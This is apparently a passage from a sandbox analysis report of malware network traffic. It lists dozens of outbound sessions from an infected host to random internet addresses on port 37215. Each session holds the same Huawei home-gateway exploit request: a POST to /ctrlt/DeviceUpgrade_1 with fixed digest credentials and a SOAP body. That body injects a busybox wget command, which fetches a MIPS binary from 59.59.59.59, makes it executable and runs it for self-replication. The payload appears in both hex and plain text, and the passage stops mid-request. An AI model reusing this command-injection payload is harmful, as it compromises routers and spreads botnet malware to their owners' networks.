2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1037192.168.2.154621041.150.157.237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.706541061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1038192.168.2.154915685.193.219.17437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.706559896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1039192.168.2.1536752167.58.130.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.706598997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1040192.168.2.1559326112.162.25.11937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.706645966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1041192.168.2.1536568169.190.4.24537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.706681013 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1042192.168.2.1538854197.159.12.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.706734896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1043192.168.2.1536202157.133.69.22437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.706756115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1044192.168.2.156048441.55.125.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.706784964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1045192.168.2.1559736157.82.237.2137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.707036972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1046192.168.2.1556098112.23.46.24137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.707052946 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1047192.168.2.1554136197.76.154.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.707072020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
